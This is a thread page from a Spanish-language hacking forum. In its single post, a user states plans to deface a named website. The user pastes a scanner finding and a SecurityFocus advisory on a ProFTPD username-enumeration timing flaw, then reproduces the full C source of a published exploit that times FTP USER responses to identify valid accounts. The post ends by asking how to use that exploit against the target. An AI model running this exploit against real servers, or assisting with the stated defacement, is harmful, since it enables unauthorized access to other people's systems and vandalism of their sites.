hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
24 de Julio de 2008, 12:57:27
Noticias: Te consideras bueno en C++?
Para ver este enlace Registrate o Inicia Sesion
Aquí

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Hacking (Moderadores: askatasun, HolyKnight, kamui23, CHR0N05, - TuX -)
| | |-+  Necesito Ayuda!!		 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Necesito Ayuda!!  (Leído 282 veces)
DnTxXx
Recien llegado
*
Desconectado Desconectado

Mensajes: 4



Ver Perfil
« : 16 de Abril de 2007, 01:54:17 »
Hola a todos!!

Este en proceso para daface una pagina!!

Ya la he escaneado con el SSS
...Seleccione una de las vulnerabilidad es que parecia!!


 FTP Servers : ProFTPD Authentication Delay Username Enumeration Vulnerability
Port 21 
Description A timing attack is described in ProFTPD that could assist a remote user in enumerating usernames. A remote attacker may exploit this vulnerability to determine what usernames are valid, privileged, or do not exist on the remote system. 
How to fix Upgrade to the current version of ProFTPD Server. 
Risk level High 
Related Links ProFTPD Homepage.
 
CVE CVE-MAP-NOMATCH 
Bugtraq ID 11430 


Al numero 11430 le di clip y me traslado a la pagina de segurity focus
Para ver este enlace Registrate o Inicia Sesion
http://www.securityfocus.com/bid/11430


La cual me di la seguiente informacion:

ProFTPD Authentication Delay Username Enumeration Vulnerability

Bugtraq ID:  11430 
Class:  Design Error 
CVE:   
Remote:  Yes 
Local:  No 
Published:  Oct 15 2004 12:00AM 
Updated:  Oct 15 2004 12:00AM 
Credit:  Discovery of this vulnerability is credited to LSS Security. 
Vulnerable:  ProFTPD Project ProFTPD 1.2.9 rc3
ProFTPD Project ProFTPD 1.2.9 rc2
ProFTPD Project ProFTPD 1.2.9 rc1
ProFTPD Project ProFTPD 1.2.9
+ MandrakeSoft Linux Mandrake 10.0
+ OpenPKG OpenPKG 2.0
+ OpenPKG OpenPKG 1.3
+ OpenPKG OpenPKG Current
+ Slackware Linux 9.1
+ Slackware Linux 9.0
+ Slackware Linux 8.1
+ Slackware Linux -current
ProFTPD Project ProFTPD 1.2.8 rc2
ProFTPD Project ProFTPD 1.2.8 rc1
ProFTPD Project ProFTPD 1.2.8
+ Slackware Linux 9.0
+ Slackware Linux 8.1
+ Slackware Linux -current
ProFTPD Project ProFTPD 1.2.7 rc3
ProFTPD Project ProFTPD 1.2.7 rc2
ProFTPD Project ProFTPD 1.2.7 rc1
ProFTPD Project ProFTPD 1.2.7
+ Sun Cobalt Qube 3
ProFTPD Project ProFTPD 1.2.6
ProFTPD Project ProFTPD 1.2.5 rc1
ProFTPD Project ProFTPD 1.2.5
ProFTPD Project ProFTPD 1.2.4
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
ProFTPD Project ProFTPD 1.2.3
ProFTPD Project ProFTPD 1.2.2 rc3
ProFTPD Project ProFTPD 1.2.2 rc1
ProFTPD Project ProFTPD 1.2.2
ProFTPD Project ProFTPD 1.2.1
ProFTPD Project ProFTPD 1.2 pre9
ProFTPD Project ProFTPD 1.2 pre8
ProFTPD Project ProFTPD 1.2 pre7
ProFTPD Project ProFTPD 1.2 pre6
ProFTPD Project ProFTPD 1.2 pre5
ProFTPD Project ProFTPD 1.2 pre4
ProFTPD Project ProFTPD 1.2 pre3
ProFTPD Project ProFTPD 1.2 pre2
ProFTPD Project ProFTPD 1.2 pre11
ProFTPD Project ProFTPD 1.2 pre10
ProFTPD Project ProFTPD 1.2 pre1
ProFTPD Project ProFTPD 1.2 .0rc3
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ MandrakeSoft Linux Mandrake 8.1 ia64
+ MandrakeSoft Linux Mandrake 8.1
+ MandrakeSoft Linux Mandrake 8.0 ppc
+ MandrakeSoft Linux Mandrake 8.0
+ MandrakeSoft Linux Mandrake 7.2
ProFTPD Project ProFTPD 1.2 .0rc2
ProFTPD Project ProFTPD 1.2 .0rc1
ProFTPD Project ProFTPD 1.2
+ Cobalt Qube 3.0
+ Cobalt Qube 2.0
+ Cobalt RaQ 3.0
+ Cobalt RaQ 2.0
+ Cobalt RaQ 1.1
 


Y me proporciono el siguiente exploit:

#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define PORT 21
#define PROBE 8

main (int argc, char **argv)
{
  int sock,n,y;
  long dist,stat=0;
  struct sockaddr_in sin;
  char buf[1024], buf2[1024];
  struct timeval tv, tv2;
  struct timezone tz, tz2;

  printf ("Proftpd remote users discovery exploit\n"
          " Coded by Leon / LSS Security\n"
          ">-------------------------------------<\n");

  if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }
 
  sock = socket (AF_INET, SOCK_STREAM, 0);
  sin.sin_family = AF_INET;
  sin.sin_port = htons (PORT);
  sin.sin_addr.s _addr = inet_addr (argv[1]);
  bzero (sin.sin_zero,8);

  connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

  printf ("Login time: ");
  n = read (sock,buf2, sizeof(buf2));
  for (y=0;y<PROBE;y++) {
     gettimeofday (&tv,&tz);
     snprintf (buf, sizeof(buf)-1,"USER %s\r\n",argv[2]);
     write (sock, buf, strlen(buf));
     n = read (sock,buf2, sizeof(buf2));
     gettimeofday (&tv2,&tz2);
     dist =tv2.tv_usec - tv.tv_usec;
     stat += dist;
     printf (" %d |",dist);
  }
  printf ("\nAvrg: %d\n",(stat/PROBE));
  close (sock);
}



Ya lo he Compilado!!

Luego que que utilizo el cdm para ejecutarlo sale esto:



La pagina q quiero atacar es:
Para ver este enlace Registrate o Inicia Sesion
www.oritucoenl inea.com

Pero la verdad es q no se que mas hacer con este exploit!!

Si alguien me puede ayudar se lo agradeceria!!
(la manera de introducirlo a la pagina, ejecutarlo o algo asi)
En línea
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online